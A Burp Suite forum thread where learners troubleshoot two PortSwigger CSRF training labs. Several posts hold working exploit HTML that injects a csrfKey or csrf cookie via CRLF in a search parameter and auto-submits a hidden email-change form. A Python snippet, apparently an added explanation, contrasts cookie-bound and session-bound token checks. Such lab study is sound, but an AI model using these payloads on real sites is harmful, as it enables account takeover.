Burp Suite User Forum


Lab #5: CSRF where token is tied to non-session cookie & Lab #6: CSRF where token is duplicated in cookie issues

LeeSu | Last updated: Oct 11, 2022 05:28PM UTC

Hello, I have been working on the CSRF labs and I'm having problems with the following labs:
- Lab #5: CSRF where token is tied to non-session cookie
- Lab #6: CSRF where token is duplicated in cookie

For Lab #5, below is what I have tried.
1. Obtained the attacker's (carlos) CSRF key from the cookie header.
2. Obtained the attacker's (carlos) CSRF token from the input parameter.
3. Crafted an HTML page that does the following:
- Inject the attacker's CSRF key into the victim's (wiener) browser cookie using the HTTP header injection method.
- Submit the email change request with the attacker's CSRF token as the "csrf" parameter value.

And below is the HTML code I made:

<html>
<body>
<iframe style="display:none;" name="csrf-iframe"></iframe>
<form method="POST" action="https://0a83008b0376a603c0921073000f00d6.web-security-academy.net/my-account/change-email" id="csrf-form" target="csrf-iframe">
  <input type="hidden" name="email" value="pwned2@evil-user.net" />
  <input type="hidden" name="csrf" value="v84NW8XMbqlYGw4pZ0Dziq3dmVNWCWDP" />
  <input type="submit" name="Submit request" />
</form>
<img src="https://0a83008b0376a603c0921073000f00d6.web-security-academy.net/?search=TEST%0D%0ASet-Cookie:%20csrfKey=zgDp4fdQA9P0XHabWg8qL4KcNuJvQoIR" onerror="document.getElementById('csrf-form').submit()">
</body>
</html>

I have also tried this:

<html>
<body>
<iframe style="display:none;" name="csrf-iframe"></iframe>
<form method="POST" action="https://0a83008b0376a603c0921073000f00d6.web-security-academy.net/my-account/change-email" id="csrf-form" target="csrf-iframe">
  <input type="hidden" name="email" value="pwned2@evil-user.net" />
  <input type="hidden" name="csrf" value="v84NW8XMbqlYGw4pZ0Dziq3dmVNWCWDP" />
  <input type="submit" name="Submit request" />
</form>
<img src="https://0a83008b0376a603c0921073000f00d6.web-security-academy.net/?search=TEST%0D%0ASet-Cookie:%20csrfKey=zgDp4fdQA9P0XHabWg8qL4KcNuJvQoIR" onerror="document.forms[0].submit()">
</body>
</html>

Upon delivering both exploits using the exploit server, I don't get any success message for the lab and it remains unsolved. The victim's email does get changed when I submit the request with the attacker's CSRF key and token using Burp Repeater. I have followed the YouTube instructions but it still didn't get solved. When I view the exploit it says "Invalid CSRF Token". I don't understand how that can be, as I have checked that I am using a fresh CSRF token and key from the attacker (carlos).

For Lab #6, below is what I have tried.

<html>
<body>
<iframe style="display:none;" name="csrf-iframe"></iframe>
<form method="POST" action="https://0a3100b904c9da75c0386aad006b00b0.web-security-academy.net/my-account/change-email" id="csrf-form" target="csrf-iframe">
  <input type="hidden" name="email" value="pwned1@evil-user.net" />
  <input type="hidden" name="csrf" value="v84NW8XMbqlYGw4pZ0Dziq3dmVNWCWDP" />
</form>
<img src="https://0a3100b904c9da75c0386aad006b00b0.web-security-academy.net/?search=TEST%0D%0ASet-Cookie:%20csrf=v84NW8XMbqlYGw4pZ0Dziq3dmVNWCWDP" onerror="document.getElementById('csrf-form').submit()">
</body>
</html>

This also doesn't work using the exploit server, but it works when using Burp Repeater. I have also checked that the csrf token gets successfully injected into the cookie header with this input "TEST%0D%0ASet-Cookie:%20csrf=v84NW8XMbqlYGw4pZ0Dziq3dmVNWCWDP" on the search function using Burp Repeater. Can you spot what the issue is with my exploits? Thank you!

Michelle, PortSwigger Agent | Last updated: Oct 12, 2022 09:18AM UTC

Thanks for your message. There has been a recent change to the exploit server, so the $cookie-injection-url needs to include SameSite=None for these two labs, for example: https://<your-lab-id>/?search=test%0d%0aSet-Cookie:%20csrf=fake;%20SameSite=None We'll be updating the solutions soon.
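The SameSite=None detail in the reply above concerns delivery: the cookie injected through the search reflection must be one the browser is willing to send on the cross-site POST. The reason these two labs are solvable at all is the validation design itself, in which the server checks the csrf form field against a csrfKey cookie rather than against the session. The Python below is an added illustration written for this thread, not code from the lab or from PortSwigger; the server secret, session identifiers and cookie values are all constructed. It models both designs side by side and shows that a (csrfKey, token) pair the attacker obtained from their own account passes the cookie-bound check when replayed under the victim's session, while a session-bound check rejects it.

```python
import hashlib
import hmac
import secrets

# Constructed server secret for this example only; a real server would load it from configuration.
SERVER_SECRET = b"constructed-example-secret-do-not-reuse"


def mint_token(binding_value: str) -> str:
    """Derive a CSRF token from the value it is bound to: HMAC-SHA256 keyed with the server secret."""
    return hmac.new(SERVER_SECRET, binding_value.encode(), hashlib.sha256).hexdigest()


def token_matches(binding_value: str, token: str) -> bool:
    """Constant-time comparison of the presented token against the one expected for binding_value."""
    return hmac.compare_digest(mint_token(binding_value), token)


def weak_check(cookies: dict, form: dict) -> bool:
    """Lab-style design: the token is validated against a separate csrfKey cookie, not the session.
    Whoever controls the csrfKey cookie the request carries also controls which token is accepted."""
    return "csrfKey" in cookies and token_matches(cookies["csrfKey"], form.get("csrf", ""))


def strong_check(cookies: dict, form: dict) -> bool:
    """Hardened design: the token is validated against the session cookie itself, so a token
    minted for any other session (including the attacker's own) is rejected."""
    return "session" in cookies and token_matches(cookies["session"], form.get("csrf", ""))


def scenario() -> dict:
    """Replay the situation described in the thread under both validation designs."""
    # Constructed identifiers standing in for the lab's victim session and csrfKey cookies.
    victim_session = "victim-session-" + secrets.token_hex(8)
    victim_key = "victim-csrfKey-" + secrets.token_hex(8)
    attacker_key = "attacker-csrfKey-" + secrets.token_hex(8)
    # The attacker can read their own token from their own account page.
    attacker_token = mint_token(attacker_key)

    # The victim's own legitimate form submission is accepted under either design.
    own_weak = weak_check({"session": victim_session, "csrfKey": victim_key},
                          {"csrf": mint_token(victim_key)})
    own_strong = strong_check({"session": victim_session, "csrfKey": victim_key},
                              {"csrf": mint_token(victim_session)})

    # Cross-site request as in the thread: the victim's session cookie is attached by the browser,
    # the csrfKey cookie has been replaced by the attacker's (which is why the injected cookie must
    # carry SameSite=None), and the form field carries the attacker's token.
    forged_cookies = {"session": victim_session, "csrfKey": attacker_key}
    forged_form = {"csrf": attacker_token}
    return {
        "victim_own_request_weak": own_weak,
        "victim_own_request_strong": own_strong,
        "forged_request_weak": weak_check(forged_cookies, forged_form),
        "forged_request_strong": strong_check(forged_cookies, forged_form),
    }


if __name__ == "__main__":
    for name, accepted in scenario().items():
        print(f"{name}: {'accepted' if accepted else 'rejected'}")
```

The cookie-bound check accepts the forged request because the token and the cookie it is checked against both originate from the attacker; binding the token to the session cookie is the mitigation, since that is the one cookie the attacker cannot obtain or substitute for the victim.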

LeeSu | Last updated: Oct 17, 2022 05:54PM UTC

Thank you for the reply, I was able to solve the labs following your instruction. Much appreciated.

BirD | Last updated: Mar 18, 2024 09:18AM UTC

I followed the steps in the video closely, but the email address was still not modified successfully ("Invalid CSRF token"). But submitting the same POC got "Congratulations, you solved the lab!". For Lab #6, below is what I have tried.

<html>
<body>
<form method="POST" action="https://0a7e00bc0330803380f10d9c00a10045.web-security-academy.net/my-account/change-email" id="csrf-form" target="csrf-iframe">
  <input type="hidden" name="email" value="pwned2@evil-user.net" />
  <input type="hidden" name="csrf" value="pIoHy5hQ3urDP85gNtiopg0nFd52a3uf" />
  <input type="submit" name="Submit request" />
</form>
<img src="https://0a7e00bc0330803380f10d9c00a10045.web-security-academy.net/?search=hat%0d%0aSet-Cookie%3a%20csrfKey=A9PU4tHQsloOMnhGwNd6Kw3Eg62DsNEH%3b%20SameSite=None" onerror="document.forms[0].submit()">
</body>
</html>

Michelle, PortSwigger Agent | Last updated: Mar 18, 2024 01:29PM UTC

Hi, when testing this on yourself, did you have the csrf token in the form set to your CSRF token and the csrfKey in the img src link set to fake? When you then deliver this to the victim, did you set both values to fake?

Mario | Last updated: Jun 13, 2024 09:35PM UTC

Hello, I have encountered an issue with the CSRF lab where the token is tied to a non-session cookie. I followed all the steps, but I am unsure if the problem lies with the browser (Burp's Chromium). I have two users, Wiener and Carlos. From Wiener, I obtain the two CSRF tokens. I then place them in the exploit server:

<form method="POST" action="https://0abc0008040bb9448762670c0028001f.web-security-academy.net/my-account/change-email">
  <input type="hidden" name="email" value="unmail777@mail.com">
  <input type="hidden" name="csrf" value="ktw3B3EXEwad9rgv4TlvZrQZ9gONdepf">
</form>
<img src="https://0abc0008040bb9448762670c0028001f.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrfKey=fGryYqHpou8b36uI8SkXKqCDCuQIxXGb%3b%20SameSite=None" onerror="document.forms[0].submit()">

After setting this up, I click on "store", copy the exploit link, and paste it into the browser where I have the user Carlos (my victim) logged in. Sometimes I open a new tab, and sometimes I stay in the same tab where I intend to change the email. When I submit the request, I get an invalid CSRF token error. I intercepted the request to see what was happening. The search is successful and sets the token, but when the POST request to change the email is made, the csrfKey is still associated with Carlos' session instead of Wiener's. Is this issue related to the browser?

Hannah, PortSwigger Agent | Last updated: Jun 17, 2024 10:39AM UTC

I've tested this lab and can confirm that it is working as expected. Have you tried encoding any special characters to see if that makes a difference? For example, for your email value, use something like "asdf&#64;asdf&#46;asdf". Please also ensure that the email address you use in your exploit is unique and has not already been used in the lab. Additionally, you may want to verify that your CSRF token is up-to-date, so you could try refreshing your original session and verifying that the CSRF token is still the same.

david | Last updated: Jul 02, 2024 08:26AM UTC

BirD's exploit is working but I can't understand why (when I view the exploit it shows "Invalid token", but when it is delivered to the victim the lab is solved). Quoting BirD's post:

I followed the steps in the video closely, but the email address was still not modified successfully ("Invalid CSRF token"). But submitting the same POC got "Congratulations, you solved the lab!". For Lab #6, below is what I have tried.

<html>
<body>
<form method="POST" action="https://0a7e00bc0330803380f10d9c00a10045.web-security-academy.net/my-account/change-email" id="csrf-form" target="csrf-iframe">
  <input type="hidden" name="email" value="pwned2@evil-user.net" />
  <input type="hidden" name="csrf" value="pIoHy5hQ3urDP85gNtiopg0nFd52a3uf" />
  <input type="submit" name="Submit request" />
</form>
<img src="https://0a7e00bc0330803380f10d9c00a10045.web-security-academy.net/?search=hat%0d%0aSet-Cookie%3a%20csrfKey=A9PU4tHQsloOMnhGwNd6Kw3Eg62DsNEH%3b%20SameSite=None" onerror="document.forms[0].submit()">
</body>
</html>

Carson | Last updated: Jul 10, 2024 09:16PM UTC

The issue from Lab 5 still exists. I've followed many guides and it always gives "Invalid CSRF token" no matter how new the token is: unused, with SameSite=None, with various symbols encoded. I think the lab might be broken internally.

Carson | Last updated: Jul 10, 2024 09:17PM UTC

It works when I try it in my own browser, but when I enter a new CSRF token to send to the victim it says "Invalid CSRF". It accepts it from my own browser each time.

Carson | Last updated: Jul 10, 2024 09:20PM UTC

Issue fixed after trying again with a new CSRF token/cookie from Carlos. I did try this step before but it didn't work; I do think the lab can be a bit hard to work with.
